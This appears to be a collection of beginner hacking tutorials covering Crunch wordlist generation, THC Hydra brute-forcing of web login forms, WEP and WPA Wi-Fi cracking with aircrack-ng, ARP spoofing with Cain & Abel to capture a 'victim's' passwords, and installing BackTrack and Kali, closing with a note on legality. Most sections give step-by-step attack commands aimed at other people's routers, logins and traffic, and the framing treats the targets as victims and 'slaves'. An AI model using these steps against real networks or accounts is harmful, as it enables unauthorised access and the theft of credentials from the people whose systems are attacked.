Wordlists With Crunch

This tutorial is going to introduce you with a Backtrack application called Crunch. In a nutshell, Crunch is a wordlist generator where you can specify a standard character set or a customized one using which Crunch will make your wordlist. Crunch can generate all possible combinations and permutations. It is mainly used for Brute-Force attacks and WPA/WPA2 WiFi cracking. In this tutorial I explain some of its main features, options and settings.
►How to Downlaoad, Extract and install
Open up a terminal and type:(You can google “Download Crunch”, and copy paste the URL instead of typing)
»wget http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.4.tgz
Once downloaded, we need to extract it.
»tar xvf crunch-3.4.tgz
Now we need to get into the directory and actually install it. Type:
»cd crunch3.2/
To Compile and install, Type the following two commands one after the other:
»make
»make install
►How to use Crunch
Once installed we can start generating our wordlists right away. Let’s start with a basic example:
»./crunch [minimum length] [maximum length] [charset / extra options]
For example:
»./crunch 1 5 abc123 –o wordlist.txt
First of we specify that we are using Crunch by typing “./crunch” (It’s directory). After that we specify a minimum length of 1 and maximum of 5. Now the –o [filename] option enables us to save all generated combinations to a simple text file. The “abc123” are the characters that we want the wordlist to contain. Pressing enter on the above command you will see some calculations that crunch performs using basic rules of Permutations and Combinations. It will tell you how much space will be required and the number of lines (or words) the text file will consist of. It will also tell you about the progress as it is creating the wordlist.
Similarly just by using a modified version of this example, we can create a wordlist containing all possible Phone Numbers. Depending on where you live, say if the phone numbers are 10 digits long you can specifiy both the minimum and maximum length to 10.
Apart from that, when setting up the character set, symbols are to be divided by a backslash “\\”. That is, if and when you want to use a symbol in your wordlist, just put in a backslash between other symbols so that the konsole doesn’t get confused.(You don’t need to do this for numbers and alphabets.)
For example:
»./crunch 1 5 abc\\!\\*\\( -o wordlist.txt
In this example, Crunch will ignore the backslash and take out the symbols in between for use in making the wordlist.
Moving On, Permutations can be created by using the –p switch between words, letters, numbers, symbols.
»./crunch 0 0 –p a b c
The above will create:
abc acb
bac bca
cab cba
Although a little knowledge of basic mathematics would help here, it is fairly easy to understand. When you use the permutation option there is just one thing different- It doesn’t allow repeating characters. While setting your character set normally would throw in every character in every possible place, you can use permutation if you are certain that you don’t want repeated characters. One thing you might’ve noticed is that we set min/max length even if we have a permutation, we still need to set it. As in this example, Just using 0 as the length will get you the required list without any problems (It simply uses everything it has). You can always set it according to your preference.
[Math, you can skip this] In that example we used 3 words, which will be a permutation of three. So that’s 3 objects taken 3 at a time.
In other words 3(P)3 = 3*2*1 = 6 possible combinations (without any repeating). For our purpose, we can simply think of it as a factorial. ►Splitting generated combinations into separate lists with predefined size:
If ever you need to, Crunch provides an option to create several lists each of an exact size. For this purpose we have –b switch which is designed to set the size of each file. So whenever crunch generates combinations that exceed ,for example 10mb it will place the next word into a separate file and go from there.
»./crunch 1 8 abcdABCD –b 30mb –o START
This will split all the generated combinations of “abcdABCD” in separate files, none exceeding the size of 30mb.
As always, practice is the key. This is another one of those things which you don’t quite get the hang of until you actually rub noses with it. If ever you have a doubt as to what any command does, best way to find out is to just try it out. Take a look at the help menu, or the official documentation for all the options and try out as many combinations as you can.

THC Hydra

One of the biggest security holes in any seemingly secure networks or systems are passwords. Install a $500 anti-virus, specifically hire a cyber security team, do anything and everything you can – But if your password is weak none of it will matter. THC-Hydra is a famous login cracker which supports numerous protocols to attack. It is a relatively easy to use and a highly efficient brute-forcer (Well, as efficient as a brute force attack can be). Although Brute-Force attacks are somewhat uncommon and never a recommended attack strategy, sometimes we just don’t have a choice. That’s where THC- Hydra comes in. (By the way, THC = The Hacker’s Choice)

►Installing Hydra – Much like Nessus, Hydra needs a few formalities before we can actually use it. We need to download, extract, install, and configure it. (We can do this in just a few commands) So let ‘s begin :
Open up the terminal(konsole) and type:
»wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
Once downloaded we now need to extract it:
»tar -xvf hydra-6.3-src.tar.gz
Now, configuring and installing (wait for the first command to complete, then type the second):
»./configure && make && install
»make install
►Using THC Hydra
(Note: If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21))
Now in order to brute-force a specific login form you need to set a username, for example a lot of networks use ‘admin’, and the admin account usually has the most privileges. (If you don’t know the username you can include a text file containing possible usernames). You also need a password wordlist, the service used for attacking and the page itself.(Read on..)
Specifying all these parameters, the attack command will look something like:
»./hydra -l admin -P /root/Words.txt website.com http-post-form “/login.php&username=^USER^&password=^PASS^”
First, you need to let the konsole know you are using hydra. Hence the “.//hydra”. Next you need to set up the various parameters and variables. The general format is first typing in the “switch”,
For example: ‘-l’ or ‘-P’ etc. And then right after a space the string or the value. The various parameters are given below :
► -l = The username
► -L = List of usernames (If you don’t know the login).
►-p = The password
►-P = The directory for the wordlists
(The -p parameter is almost never used, Why would you want to brute force if you already know the password ? -P is used almost always)
If we’re attacking a web form over http and the method is post then we use “http-post-form”. Another example, if the service is FTP simply use “ftp”. You will have to sniff around the website that you want to get access to find out exactly what it uses. Such information may be found in the URL, the “About” page or can be googled.(You can also Right click the page and click “View Source”)
Another thing you should be aware of is that the variables username and password are not always the same. They different depending on the website or service you are using. What I mean by this is while some website uses ‘admin’ another might be using ‘administrator’. Viewing the page source, you can generally easily find out in what variable they are storing the values.
This was a rather small example. Like every other tool, Hydra has a variety of parameters and options that can prove very useful in different cases and are more in number than can be discussed here. (‘Help’ command can help you explore, but there’s no substitute for actually experimenting.)
The above discussed parameters are the ones most often used. Below are a few more less common ones :
►-vV – The verbose mode. This mode shows you every login attempt hydra tries.
►-s – We specify the port on which we’re running our attack.
►-x – For brute-force parameters generation. We define our charset and minimum & maximum length of it.
►-R – Restores a previously aborted session of an attack.
►-e ns – Checks for blank or no password fields.
So an example of an advanced attack would look something like this:
»./hydra -L /root/usernames.txt
-P /root/HugeDB.txt
-e ns -vV -s 80
website.com http-post-form “/login.php&username=^USER^&password=^PASS^
(That’s all supposed to go within one command, one line)
Try deciphering what exactly this command does.

Hacking WEP – II

([For this tutorial you need external WiFi adapter] OR [have BackTrack installed in your Hard Drive, not a virtual machine])
(Otherwise, look for the method using normal windows OS in the intermediate section)
Open up BackTrack, Login and then follow the below steps
1. Open konsole and type the following to start up network connections.
»/etc/init.d/networking start
2. Now we are going to put the network card into moniter mode by typing the following.
»airmon-ng
(You will find your Interface here)
3. So first start up the scan
»airmon-ng start wlan0
or
»airmon-ng start wlan1
(this command depends on what it reads on your router or networking card as, replace as needed)
4. Lets spoof your MAC address first by typing this next command.
»ifconfig wlan1 down
»macchanger -r wlan1
»ifconfig wlan1 up
This will change the MAC address being used to the computer we are connecting to.
5. Time to start finding our victim’s router, type the following in konsole.
»airodump-ng mon0
This will show the entire list of all the WiFi connections your adapter can catch and once you find one that suits your interest, and continue:
6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole: (Read slowly!)
»airodump-ng -c [channel number] –bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)
For Example: »airodump-ng -c 1 –bssid 11:22:33:44:55:66 -w Newcapfile mon0
(*IMPORTANT- You have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID, channel number from the previois steps, ‘mon0’ or ‘mon1’ based on your adapter, and for name of cap file you can type in any file name like ‘MyCapFile’)
7. Lets start the passphrapse cracking. We need to get around 30,000-50,000 IVs(packets). We start by sending fake authentication requests. To do this open a new konsole and type:
»aireplay-ng -1 1 -a [The BSSID of the router] mon0
example: »aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
8. Almost done, we just need to contune the capturing process, open another konsole and type:
»aireplay-ng -3 -b [The BSSID of the router] mon0
Now it will start replaying ARPs. (ARP = Address Resolution protocol, it is needed to find the device address from the IP address)
Collect a good amount of IVs like around 30,000-50,000(the more the better).(Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours). It should be stored in the .cap file Once you’ve captured enough packets, type CTRL + C to stop the process and continue to step 9.
9. Time to start cracking that cap file You can think of it like every single packet contains a bit of leaked password. So we’ve captured a large number of packets, compiled them in the .cap file and now we’re going to try and find out tiny bits of information from each packet and piece it together to give us the PassPhrase. Open a new konsole and type:
»aircrack-ng -b [bssid] [file name]-01.cap
example: »aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
10. Wait a few seconds and we should now be presented with the key to log in to the router.
Key Commands.
►nwlan0 = Interface (Examples: wlan0, ath0, eth0)
►nch = The channel the target is on (Examples: 6, 11 You can find out using your wifi adapter’s interface)
►nbssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
►nssid = Name of target (Examples: linksys, default)
►filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
►fragment-*.xor= The * being replaced by a number
►(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

Installing Kali

Around April 2014, www.backtrack-linux.org officially stopped supporting backtrack downloads. This was mainly due to the release of Kali 1.0.6 which fixed majority of the bugs in the OS. Although Backtrack is still available through torrents, it’s better to move on to newer and better things, namely, Kali.
In a nutshell, mathematics tells us the difference between windows 8 and windows 8.1 is 0.1, Similarly, Backtrack and Kali are not that different. Kali is the like the next revamped version of BackTrack. If you prefer to keep using Backtrack, you’re not exactly missing out on something huge (yet). But still, it’s always better to use up to date software, nobody knows that better than us hackers. Backtrack ruled the hacking universe for nearly 8 years (released in 2006) and now the torch is in the hands of Kali. So, here we’ll be taking a brief look at the two operating systems, their differences and advantages of Kali over Backtrack and finally how to install Kali.
Differences between Kali & BackTrack
Like I said, Kali is not so different than Backtrack. At first look, you’ll probably notice the slight GUI change. The tools are in different places but it shouldn’t take long to get used to. One major difference beginners may not notice is that Kali is built on Debian Linux instead of Ubuntu Linux. The Debian vs Ubuntu debate is a whole other topic, so we’re not getting into that. Plus, you don’t need to fill your head with unnecessary information. Kali can be thought of as the next iteration of Backtrack. The developers are the same, the functionality is almost the same and the GUI change is definitely for the better.
The advantages of Using Kali Over BackTrack
•’Some’ new tools.
•The new GNOME interface.
•Regular updates, updated tools like Metasploit, p0f etc.
•A build specifically designed for the ARM architecture (read: ‘android smarphones compatible’).
•All tool directories are in the PATH variable, so any tool can be called from anywhere.
(Also now that backtrack has no future, we don’t have that much of a choice)
There’s no game changer advantage of Kali over Backtrack. But now that Backtrack is no longer going to update, vulnerabilities will start popping up in the OS which will be fixed in Kali but not Backtrack. The last thing a hacker needs is to get hacked him/herself. Let’s install Kali now. If you’ve installed Backtrack earlier, the installation process of Kali is practically identical.
Step 1: Download & Burn Kali
Head over to: http://www.kali.org/downloads/
There are quite a few options, the only ones you need to worry about are 64 bit or 32 bit and torrent or direct download. Check out the properties page of your ‘My Computer’. If your architecture (OS and processor) are 64 bit, download the 64 bit one. If you’re not sure, you may simply download the 32-bit version which works on all systems. (If you have 4GB or less RAM, 32 bit or 64 bit doesn’t make a difference). The download is around 3GB in size.
Below on that page you’ll see two more versions, ARMEL and ARMHF. They are relevant when installing Kali on ARM hardware devices (like Android smartphones and tablets). But, right now we’re trying to get Kali running on a PC.
Once we’ve got the ISO file, you can either burn it to a DVD to install as a permanent OS on your system or you can create a bootable USB Drive using software like UNetBootin. (See the tutorial on Backtrack for exact instructions)
Step 2: Install Kali
We’ll be installing Kali on a Virtual machine. The two best virtualization systems are VMWare and Virtual Box. They are both equally good, but VMWare is paid. So, for a beginner hacker I recommend using Virtual Box. On startup, just like BackTrack, you can log in as “root” with a password of “toor”. Then, type “startx” to start the X-Windows system.
Using a virtual machine may not always be ideal. The main disadvantage is performance. Running an OS on top of another OS is bound to cause lagging. A system with 4GB RAM should handle it sufficiently well as long as no other programs are running. For optimal performance, 6GB (or more) RAM is recommend.
Further, for wireless hacking using a virtual machine, we need an external wireless card or adapter. They are usually small pen drives using which you can connect to a wifi network. Also, they must be compatible with aircrack-ng, the main wifi hacking software.
As mentioned before, you may also install it alongside your present OS so that both of them can mind their own business one at a time. To do that, you can use your burned DVD or USB drive and simply boot with the booting device jacked in. (You may need to alter the Booting Sequence through the BIOS menu).
Once the booting begins, you can click on the Install Kali button and follow the steps in the install wizard.
The disadvantages of using a VM are the advantages of using a dual boot system. Kali will run faster with less resources, you will not need an additional wireless card and you will not have the additional complexities of working in a VM. But installing another permanent OS may not be ideal for everyone. You may choose whichever method you like. If you have used another Linux distribution with the GNOME interface, you’ll notice that the pull-down menus at the top of the desktop look familiar, just like Backtrack. Also just like backtrack, we can find all the same tools (and some new ones) in the same upper left corner applications menu categorized in the same way. One interesting menu is the “Top Ten Security Tools” menu. You’ll find that it includes some of the most popular tools such as nmap, Metasploit, sqlmap, Wireshark, and aircrack-ng among others. Now you’re all set and you can start hacking with Kali Linux!
*Since Kali officially supports ARM hardware, almost all android devices can run Kali. There’s an app called ‘Linux Deploy’ on the play store which does all the heavy lifting for us. All we need to do, is set a few options and hit install. The requirements for installing Kali on android phones are : Minimum android version 2.1 (rooted), 5GB free space in any one place (internal or external storage), decent internet speed and some patience.
Here’s the URL for the Linux Deploy app:
https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy
And here’s the official tutorial for getting Kali up and running on your smartphone:
http://www.kali.org/how-to/kali-linux-android-linux-deploy
Linux Deploy basically lets the user select which Linux distribution they want to install, the processor architecture, mirror URL, installation path etc. If you simply want to get it up and running quickly, Linux deploy provides defaults that almost always work. Although very improbable, even if something does go wrong, the installation of Kali on your android phone is completely reversible. On hitting the Install button, Linux Deploy will start downloading the image file and then go on to install it.
For exact instructions, head to the official tutorial URL given above.
A few pointers: Make sure you select Kali Linux under the distribution tab. The download is approximately 2GB in size, so plan accordingly. There are two architecture types, ARMEL and ARMHF. ARMEL is for ARMv4 instruction set and ARMHF is for ARMv7 instruction set for the phone’s processor. The majority of phone today have ARMv7 (or above), but if you have a relatively old model, you may wish to google up your phone’s specifications to find out which one you can run. One last thing, around 4GB minimum is recommended for the image size but if you plan on installing a lot of tools you can manually change the image size in Linux Deploy.

Installing Backtrack

How to Install BackTrack 5(contents)
►Download the BackTrack 5 ISO
►Setting up a Virtual Machine
►Installing BackTrack 5
►BackTrack Login
►(Optional) Creating a Bootable USB Drive
►Download the BackTrack 5 ISO
Head over to: http://www.BackTrack-linux.org/downloads/ Then click the download button.
After that, you need to pick the version of BackTrack that you want. Pick the latest one, it’s BackTrack 5 R3 at the time of writing this tutorial. The window managers(KDE and Gnome) are both pretty much equal, choose any. Pick the architecture according to your system’s specs(Right click on My computer to find out, 32 bit or 64 bit) . We want the ISO file type because we can use it on a DVD, a USB flash drive, and install on a virtual machine. Direct download or torrent download is up to you. The file is little over 3 GBs, so it may take some time depending on your internet speeds.
(You’re now setting up a whole new operating system, which takes time, So I suggest you read this tutorial before beginning once completely, and then refer to it if you get stuck, it’s relatively easy)
►Setting up a Virtual Machine
A virtual machine (VM) is the software implementation of a physical computer. In other words, it’s having another computer on your current computer. If you have never used a virtual machine it is a good time to start. VMs are excellent when it comes to practicing your hacking techniques as they provide somewhat of a safe closed environment, such that any damage, if it occurs is contained within the dummy operating system, which can then be simply restarted to start afresh.
To start, you’re going to need to get VM software. There are many out there, here are a few popular ones.
VMware Player (Windows/Linux) – Free
VirtualBox (Windows/Mac/Linux) – Free
Whichever VM software you go with, make sure it has a way to network with other VMs. If you don’t want to spend the money, go with VirtualBox. If you plan to get serious with penetration testing, you might want to consider getting a VMware Workstation license. It is full of useful tools and goodies such as sharing VMs and remote access and easy to work with. The easiest to install is ‘Windows Virtual PC’, it will do for beginner purposes. These programs are very similar in function. You shouldn’t have trouble following the basic setup instructions.(Google any Virtual machine software and install it)
After everything is installed and running, click “Create new virtual machine”. (Depending on which one you install, the instructions might be a little different. If you look around there will definitely be similar options).
Next you’re going to select “Installer disc image file” then browse for the BackTrack 5 ISO.
Select the operating system as linux, and the version as Ubuntu.
Give the virtual machine a name such as “BackTrack 5 R3” and select a location for where you want to save the virtual machine files.
When asked how much you want the virtual disk drive to be, you want at least 25 GB. This will be the most demanding requirement of BackTrack 5. Although the BackTrack-linux wiki says you need at least 20 GB, I found you will run out of space by the time you install updates or any other software (Feel free to put in even 5-15 Gb, if you simply want to look around. The OS is not the big, the tools are). Then, you will have the option of storing the virtual disk as a single file, or split into multiple files. Creating a virtual disk as a single file will allocate all of the space right away. Splitting into multiple files means the drive files will grow as you need them. So if your hard drive space is limited on your host system, go with multiple files. If you have a massive drive, and not worried about space, go with a single file.
And that’s it! The virtual machine is ready to go. The recommended minimum RAM is 512 MB, however you can try lower if you need to.
Power on the virtual machine and you will be ready to install BackTrack.
►Installing BackTrack 5
If you are installing on a hard drive, you will need to burn the BackTrack 5 ISO on to a DVD or a USB Drive.
First turn on your machine, then insert your DVD or USB Drive. Then press the key that allows you to select your boot drive. You may have to go into the bios to enable this. Most often, F12 will work. Select either your DVD drive, or your USB Drive to boot from it. (You may simply use the ISO file also. Windows virtua PC, for example gives an option to simply select an ISO file and start up directly)
After a few moments, you will see BackTrack Live CD menu. Press enter on ‘BackTrack Text – Default Boot Text Mode’.
Wait about 10 seconds, and you will come to BackTrack shell console. Type the command “startx” to load the GUI.(If you directly used the ISO file without burning it to anything, your operating system will be now ready. If you prefer to burn the file to a DVD or pen drive follow the steps below)
After another few moments, you will come to the desktop of BackTrack. Double click on the “Install BackTrack” to begin the install process.
After you select your time zone, and language, you then have to partition your drive. If you are using a virtual machine, go ahead and use the whole drive. If you are dual booting, you will have to specify your partition for your two operating systems.
Continue through the installer, and then click finish. BackTrack will then install on to your system. This process takes about 10-15 minutes.
►BackTrack Login
After it is finish, restart your system.
After restarting, you will come to a login screen.
The default root name for BackTrack is “root” and the password is “toor”. After typing in the root username and password, you will come back to the BackTrack shell. Type “startx” to enter the GUI desktop, and we’re done ! I recommend you look around get a feel of all the tools and applications that come pre-installed on the amazing BackTrack OS.
►(Optional)Creating a Bootable USB Drive
Required Items:
A USB flash drive with minimum space of 4 GB.
BackTrack 5 ISO
UNetbooin – ( http://unetbootin.sourceforge.net/ )
UNetbootin is a program that allows you to create bootable USB drives for linux distros and Windows. UNetbootin will download the distribution or use an ISO file you selected from your hard drive.
Once UNetbootin is downloaded you can run it by double clicking (Windows), plug in your USB Drive.
Start UNetbooin and select the “diskimage” option, then select your BackTrack 5 ISO.
Select your USB Drive, then click “OK”.
(WARNING: This will format your USB Drive and remove all previous data.)
Now you should be able to boot off of your USB Drive with BackTrack 5.

More On Hacking WiFi

This article is fairly basic but it should give you some good background information of where and how to start and how WiFi hacking works.
Before all that, let’s take a look at some background information about the stuff involved in hacking WiFi.
IP Addresses:
People starting off in networking often get confused with this and is one of the most important and vital parts of information you will use and need. Each computer system has 2 types of the so called IP Addresses. Internal and External.
External IP Address is what your ISP assigns to your modem. The external IP Address is NOT required in Wireless Hacking.
Internal IP Address is what will be used in wireless network hacking and is the IP Address which the actual hardware router assigns to each computer. Unless specified in the router/computer settings, IP Addresses are dynamic and so will change nearly every time the computer disconnects and reconnects to the router the IP will be different.
Basic software for someone interested in Networking is an IP Scanner. Most Networking software e.g. Cain, which I will go into further, includes an IP Scanner. There are lots of Scanners out there and a quick search on google will bring up a few good ones too.
Wireless Network Hacking:
The are several different types of encryption out there but since this is a basic guide I will focus on just one and mention the other.
The one I will be focusing on here is WEP (Wired Equivalent Privacy) encryption. Hopefully, you’re not protecting your network with this, if you are, I guarantee you will soon be in a hurry to change it. See for yourself, Read on ! WEP has been demonstrated to have numerous flaws and therefore the industry is basically forcing people to change to WPA/WPA2 encryption (by limiting speed between computer and router to 54mbps on wireless routers).
The exact details of how the WEP encryption works are a bit too technical to be discussed here, All you need to know is that WEP is extremely vulnerable. (If possible, change it to WPA/WPA2 ASAP!)
MAC Filtering:
Before WPA/WPA2 came to the market and was added as a standard encryption method to routers, many people resorted to Mac Filtering as an extra layer of security.
A MAC address is just an identification string made up of numbers and characters which every device that connects to a router has. So that is all Network Adapters. MAC filtering works by only allowing computers with a certain MAC address to connect to the router. However this can be easily overcome by spoofing your MAC address with simple software which I will go into later.
The fastest and most effective way to hack a wireless WEP Network is with a piece of incredible software called Aircrack-ng (http://www.aircrack-ng.org/).
(For more info on Cracking WEP, press the back button and check out the tutorial on “Cracking WEP”.)
Once you’re in the network. The real fun begins.
Intercepting Network Information:
When information is sent anywhere on a network, the information is converted to fixed sized “packets”. These are the packets and these are what you will be intercepting.
We will look at the main type of attack which is also the easiest.It uses a piece of software called Cain & Abel (http://www.oxid.it).
Once installed Run the application. It may come up on some Anti-Viruses and May also come up with a message claiming your firewall is restricting its access. In most cases both these are errors.
You have 2 toolbars at the top. The top one with File/View/Configure/Tools/Help and the second one. The 2 main buttons you will need are located on the second toolbar and are the second and third from the left. One that looks like a motherboard (Starts/Stops Sniffer) and the other one that looks like a Nuclear icon (Starts/Stops APR).
Go ahead and click the Sniffer button located on the second toolbar second from the right. Then go ahead and click the Sniffer tab and make sure hosts is selected at the bottom tab. Then right click anywhere in the white area and click “Scan MAC addresses”. Click OK. Once this is done, if there are other computers on your network they should appear in the listbox. Highlight them all and then right click, selecting “Resolve Host-Name”. This is basically an IP scanner as I mentioned before. Giving the Internal IP Address and the Host-Name on the right to help you identify your slave.
Now you need to find out your gateway address which is the IP Address of your router. Go into CMD and type IPCONFIG and look for the gateway address. An example would be 192.161.1.1
Once thats done. Click on APR on the bottom tab. The page should now be divided into 3, with aload of APR tools on the left and then 2 separate listboxs on the right. Click on the top listbox and you will notice that on the second toolbar, that there is a blue plus icon 7 from the right. Click that.
Now a pop up with 2 listboxes will appear. On the left select your gateway Address and then on the right select your victims IP Address. Then select OK. You will now notice that they appear in the top listbox. Click on them and make sure its highlighted. Now click the Nuclear icon on the second toolbar 3 from the left. It should now start poisoning the other computer meaning all the traffic to and from that computer is going through your computer. This is called ARP spoofing. It is a computer hacking technique whereby an attacker sends fake (“spoofed”) Address Resolution Protocol (ARP) messages onto a Local Area Network. ARP spoofing allows us to intercept data frames on a LAN.
If the person is active on the computer using the network you will see the second listbox start filling up with routing packets. If you click the password tab at the bottom. Any unencrypted websites they enter their password in, will show up in that box. HTTPS/SSL websites which are encrypted will show up as usually a random string or nothing at all. Often when someone is spoofing a slave. If they visit a HTTPS website, it may come up with a warning message with commercial browsers as the SSL encryption cannot verify with the server since the software tries to replace it with a fake one. This can lead to suspicion of intrusion with the slave.
Analysing the Packets:
Now that we have all this data streaming through our computer we need another piece of software to analyze it. This is where Wireshark comes in (http://www.wireshark.org/).
Wireshark is fairly basic to use. Install it and run it. Then click on the first icon on the second toolbar. Check the box with the most packets running through it and click start.
You should now have a stream of packets flowing through. There are countless things you can now analyse and view from your slave. You have all the data which is going to and from there computer. Viewing it and analysing it can be simple but also tricky depending what your trying to find out.
Theres plenty more information on how to use Wireshark on the Wireshark wiki (http://wiki.wireshark.org/).
From here you can develop your skills and further your knowledge on networking. This sheds a light on how vulnerable our virtual privacy really is. It’s really not surprising so many people regularly use softwares like VPN’s and proxies.

Hacking WPA

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, it’s simply uncrackable (yet). But most Networks do use PSK only, so your chances are good. Before continuing on just take a look at what type of protection the network has.
The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols. This is because in this Hack our only option is to use a Dictionary attack, that means literally test each and every word in a text file and checking whether it is the password. A simple google : “Dictionary attack list” will give you a text file containing all the known words, Pick the one that’s the biggest.
There is another important difference between cracking WPA/WPA2 and WEP which is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs(more packets) like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network and attempts to authorize. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack if the password is set to anything unusual, since even an 8 character password is almost impossible to brute-force.
This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.
Also, there is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
There’s pretty much no steps in this tutorial. All you need is the .cap file and a dictionary list.
Check out the WEP cracking tutorial, complete till step 10. Then you’ll have your .cap file which contains information about handshakes that aircrack uses to crack the key.
After you get the .cap file open up Aircrack -ng, just on the first screen find and select your .cap file, select WPA Encryption option and find and select your dictionary list. If the password is in the dictionary list, you’ll see the magic happen and the key will appear.
You can simply try googling for a Dictionary WordList, there are tons out there .Try as many as you can, and if possible compile several into one and let aircrack do it’s thing overnight. Again, cracking WPA/WPA2 is much harder so you need probability on your side to have a real chance at getting the password.
I’ve noticed that in many cases, the WPA key is simply the mobile number of our naive victim. It’s usually 10 characters, easy to remember/type and luckily for us, relatively easy to crack.
(A tutorial on creating your own wordlists easily with ‘Crunch’ can be found in the Expert category)

Hacking WEP

Tools Required:
1. CommView for WiFi: http://tamos.com/download/main/ca.php
2. Aircarck-NG GUI: http://aircrack-ng.org/
1. Install CommView. While installation you maybe asked whether you want to install the application in VoIP mode or Standard mode. Both mode will work fine for our case. But I usually used the VoIP mode. It will automatically seraches and installs the available drivers needed for making the wirless adapter to enable the packet capture (by turning on promiscuous mode). Just allow it to install the needed drivers an you are good to go to the next step. And please note that while using CommView, your WiFi networks will get disconnected. Don’t panic, you are doing right!
2. After the installation, start the application and click on the left arrow on the left side.
3. You will be prompted with a new window. Click on the Start Scanning button.
4. In the right column, all the available networks around you will be shown. Just click the network you want to get the password, and click on “Capture”. Please note that, this tutorial is for WEP networks only!
5. Now the newely opened windows will be closed and you can now see that the CommView started capturing the packets.
6. Click on Settings> Options> Memory Usage. Change the value of maximum packets in buffer to 20000.
7. Now you can click on the logging tab. Select “Auto Logging”. Enter 2000 in the “Maximum Directory Size” and 20 in the “Average Log File Size”. We just told the CommView to capture *.ncp packets with each file of 20MB size and store it in the directory we chosed.
8. Again go to “Logging” tab and select “Concatenate Logs” to join all the split logs of 20 MB we just created. And now we have one *.ncf file.
9. Go to File>Log Viewer> Load CommView Logs> and choose the *.ncf file that we just got form the above Concatenation step.
10. Click File> Export> Wireshark/Tco dump format. This will create a .cap file
11. Go to the Aircrack application folder and then traverse to the bin file inside. Double click on Aircrack-ng GUI.exe in the application, choose the *.cap file we just created in the step 10.
12. And that’s it! If you sufficient data to crack the password, you will get the password. It is advisable to proceed from step 8 to 11 only after receiving enough packets. You will need a minimum of 100000 packets to start the cracking. So after step 7, it is advisable to leave the system alone for 2-3 hours and then proceed to the further steps!
NOTE:
Recently CommView became a paid software with a rather ridiculous price tag. But, no worries. There are more than enough alternatives. Some of them are mentioned below and can be used to obtain the .cap file as explained above:
•Cain $ Abel:
http://www.oxid.it/cain.html
•WireShark:
http://www.wireshark.org/
For about a couple dozen more, check out the wikipedia page (link below )listing almost every packet analyzer:
http://en.wikipedia.org/wiki/Comparison_of_packet_analyzers
They all work the same way, basically all we need is a means to get the .cap file and after that the role of packet analyzers is over. For most purposes WireShark is more than enough, so kindly check out this one first. On a seemingly unrelated note, the war against piracy wages on and packet analyzers have become victims too. Proprietary softwares like CommView continue to be easily available on torrent websites which shows just how harmful hacking can be to a company.

Limits Of Legality

Anyone serious about learning hacking should make sure to go through all the relevant laws in their jurisdicitions. For those who are not so serious, it is even more important. Simply goofing around may be enough to rack up a hefty fine, probation or even a sentence. In germany, for example, simply owning a tool that can be used for hacking, is a crime. One may actually be convicted for downloading a freaking app. In the same country, a professional penetration tester or a 12 year old may be regarded as criminal hackers just because s/he downloaded Cheat Engine (I’m serious) or BackTrack OS. This is not to single out Germans but to show that imperfect laws still exist in almost every country’s constitution (Germans, don’t worry. I have a lot more laws to insult from all over the world. But we’ll leave these for another day) This problem depends on your geography only a little, but it is mostly global.
Why bother with all this legal nonsense? If you’re not the type to spend your life fighting pointless politics or start protesting around to change existing laws, you need to follow them. After all, what choice do we have? Jail? Sure, why not. If you aren’t against something, then by definition, you support it. Anyways, let’s leave politics for another website.
When it comes to hacking, no matter where you live, practically doing it means walking a fine line. But, before anything else, before the law too, you need to look after yourself and make sure you are aware of every possible consequence of performing a hack or anything even remotely related. From running batch files, which can wreck your computer to hacking a school’s server which can get you expelled to leaking NSA secrets which can open the eyes of the world, you need to tread carefully. When it comes to hacking, there is no universal definition of right and wrong. It’s different for the government, it’s different for the anonymous hackers group and it will be different for you and me. While we’re on this, you may have heard about the “criminal” anonymous hacktivist group and their “illegal” and “unethical” activities in the news and media somewhere. Take a wild guess, who’s definition of right or wrong does the media follow?.. The obvious can be surprising. Change your viewpoint and you can change your world.
Coming back to the limits of legality, what all is legal for an average joe who wants to learn hacking? Although the exact answer will depend on your address (another bug in the matrix..), there are some general things you should keep in mind while learning and carrying out different hacking techniques, no matter where you live. These are not only to keep you out of jail but also to protect you from yourself. Since our lives will just keep on getting more and more dependent on technology, hacking is no longer just about hacking. Plus, it won’t hurt to double check what you’re doing won’t get you in trouble.
•Know what you’re doing.
Whatever the hacking method you’re trying to do, it can never hurt to know a little more than what you need. You just might end up saving yourself a lot of trouble. Just one misplaced command in a batch file virus could spell disaster. As a rule of thumb: If you don’t know what you’re doing, don’t do it. In the world of hacking, it’s easy to get carried away, specially when you try out something new, it works and you want more. Skipping the learning phase and moving straight to the doing phase is what turns potential hackers into script kiddies. In professional penetration testing, a small mistake in typing the IP address may result in you “hacking” into a whole different company on the other end of the globe. Clearly, they may not care about the difference between “pentesting” and “hacking” and your boss will find a lawsuit waiting to greet him. Actually, typos don’t really lead to lawsuits. The point is, a big firm can probably get away with a little mistake. You can’t. If you hack into some server or network where you don’t have permission, there is no justification for what you’re doing there (if you’re caught). Now THIS, looks more like lawsuit material.
•Know the consequences of what you’re doing.
